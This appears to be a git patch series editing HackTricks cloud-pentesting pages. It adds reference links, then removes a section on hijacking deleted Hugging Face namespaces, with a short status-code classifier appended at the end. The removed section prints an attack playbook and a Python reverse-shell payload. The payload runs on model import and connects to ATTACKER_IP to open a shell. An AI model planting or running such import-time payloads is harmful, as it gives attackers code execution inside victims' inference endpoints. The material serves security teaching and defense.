 - [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
@@ -251,8 +266,12 @@ Different protections can be applied to a branch (like to master):
 - [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github)
 - [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards)
 - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
+- [https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions](https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions)
+- [https://securitylab.github.com/resources/github-actions-untrusted-input/](https://securitylab.github.com/resources/github-actions-untrusted-input/)
+- [https://docs.github.com/en/rest/checks/runs](https://docs.github.com/en/rest/checks/runs)
+- [https://docs.github.com/en/apps](https://docs.github.com/en/apps)
+- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1)
 
 {{#include ../../banners/hacktricks-training.md}}
-

From 89a2ab54aef02763e22ed26ea8949e2070dda753 Mon Sep 17 00:00:00 2001
From: SirBroccoli
Date: Mon, 29 Sep 2025 23:03:04 +0200
Subject: [PATCH 3/4] Update pentesting-cloud-methodology.md

---
 .../pentesting-cloud-methodology.md | 69 -------------------
 1 file changed, 69 deletions(-)

diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md
index ea387a405..41fce1f4c 100644
--- a/src/pentesting-cloud/pentesting-cloud-methodology.md
+++ b/src/pentesting-cloud/pentesting-cloud-methodology.md
@@ -420,75 +420,6 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
 
 - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
 
-## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse)
-
-A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker.
-
-Key cases on Hugging Face hub:
-- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model.
-- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content.
-
-Recognition heuristics (HTTP):
-
-```bash
-# Author existence
-curl -I https://huggingface.co/<Author> # 200 exists, 404 deleted/available
-
-# Legacy model path behavior
-curl -I https://huggingface.co/<Author>/<ModelName> # 307 redirect (transfer) | 404 deleted until takeover
-```
-
-Exploitation playbook (abstract):
-1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs.
-2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author.
-3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True.
-4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoint’s permissions.
-
-Payload on load (example):
-
-```python
-# __init__.py or a module imported by model loader
-import os, socket, subprocess, threading
-
-def _rs(host, port):
-    s = socket.socket(); s.connect((host, port))
-    for fd in (0,1,2):
-        try:
-            os.dup2(s.fileno(), fd)
-        except Exception:
-            pass
-    subprocess.call(["/bin/sh","-i"]) # demo purposes only
-
-# Gate on an env var if desired
-if os.environ.get("INFERENCE_ENDPOINT","1") == "1":
-    threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
-```
-
-Cloud platform impact and examples:
-- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code.
-
-{{#ref}}
-gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
-{{#endref}}
-
-- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions.
-
-{{#ref}}
-azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md
-{{#endref}}
-
-Detection and hardening:
-- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership.
-- Pin to a specific commit in loaders to prevent silent replacement:
-
-```python
-from transformers import AutoModel
-m = AutoModel.from_pretrained("Author/ModelName", revision="<commit>")
-```
-
-- Clone vetted models to trusted internal registries/artifact stores and reference those in production.
-- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered.
-
 ## Google
 
 ### GCP

From fc5e23269cd3f829b7b0c3aa1b3f117070009be4 Mon Sep 17 00:00:00 2001
From: SirBroccoli
Date: Mon, 29 Sep 2025 23:03:41 +0200
Subject: [PATCH 4/4] Update pentesting-cloud-methodology.md

---
 src/pentesting-cloud/pentesting-cloud-methodology.md | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md
index 41fce1f4c..bc79cb2d3 100644
--- a/src/pentesting-cloud/pentesting-cloud-methodology.md
+++ b/src/pentesting-cloud/pentesting-cloud-methodology.md
@@ -454,11 +454,6 @@ azure-security/
 You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**.
 
-## References
-
-- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/)
-- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo)
-- [Transformers docs: Security and remote code](https://huggingface.co/docs/transformers/installation#security-and-remote-code)
 {{#include ../banners/hacktricks-training.md}}
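
The namespace-reuse recognition heuristics quoted in the diffs above reduce to classifying the HTTP status returned for a legacy `Author/ModelName` path. A minimal offline sketch of that classification logic (the `classify_namespace` helper name is hypothetical, not from any library; status semantics follow the heuristics above):

```python
# Map the HTTP status observed for https://huggingface.co/<Author> (or a
# legacy <Author>/<ModelName> path) to the namespace-reuse cases described
# in the patches above. Pure logic only; fetching the status (e.g. via
# curl -I or requests.head) is left to the caller.
def classify_namespace(status_code: int) -> str:
    if status_code == 200:
        # Author/model currently registered and resolvable.
        return "exists"
    if status_code == 404:
        # Deleted namespace: re-registrable, i.e. takeover candidate.
        return "deleted/available"
    if status_code == 307:
        # Transfer redirect: legacy path becomes hijackable if the old
        # author is later deleted and re-registered by an attacker.
        return "transferred"
    return "unknown"

if __name__ == "__main__":
    for code in (200, 404, 307, 500):
        print(code, classify_namespace(code))
```

In practice this would be paired with a HEAD request per identifier harvested from code, notebooks, and model cards, flagging every `deleted/available` and `transferred` hit for manual review.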